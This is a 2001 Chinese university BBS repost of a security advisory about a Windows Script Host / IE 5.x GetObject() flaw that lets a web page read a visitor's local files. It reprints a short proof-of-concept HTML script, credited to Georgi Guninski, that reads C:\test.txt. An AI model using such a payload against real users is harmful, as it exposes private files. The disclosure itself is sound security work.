● [转载] MS Windows Script Host GetObject()安 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: jjksam (Linux,c/c++,java), 信区: Security
标  题: [转载] MS Windows Script Host GetObject()安全漏洞(转寄)
发信站: 荔园晨风BBS站 (Tue Nov 27 08:51:04 2001), 转信

【以下文字转载自 jjksam 的信箱】
【原文由 jjksam@smth.org 所发表】
发信人: Quaful (夸父·逐日), 信区: Security
标  题: MS Windows Script Host GetObject()安全漏洞
发信站: BBS 水木清华站 (Mon Nov 26 19:48:45 2001)

Microsoft的Windows Script Host（Windows 98/ME/2000/XP自带）存在一个
安全漏洞，可以让Web站点读取访问者的硬盘上的文档。示例代码：
test.html文件，可以读取C:\Test.txt文件：
<HTML>
<HEAD>
<TITLE>
IE 5.5 security vulnerability - GetObject() exposes user's files -
Georgi Gunins
ki Security Research
</TITLE>
</HEAD>
<BODY>
IE 5.5 security vulnerability - GetObject() exposes user's files.
<BR>
Written by Georgi Guninski
<SCRIPT>
alert("This script reads C:\\TEST.TXT\nYou may need to create it");
a=GetObject("c:\\test.txt","htmlfile");
setTimeout("alert(a.body.innerText);",2000);
</SCRIPT>
<BR>
<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
</BODY>
</HTML>

受影响的系统：所有的IE 5.x版本，包括IE 5.5 SP1/SP2

--
*               _____      o
*   _______     │ │       o
*      ____====  ]OO|_n_n__][.     |WU~~~ 火车来啦! |
*     [________]_|__|________)<    |HONGLONGHONGLONG|
*      oo    oo  'oo OOOO-| oo\\_   ~~~|~~~
*  +--+--+--+--+--+--+--+--+-$1-+--+--+--+--+

※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.168.99]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店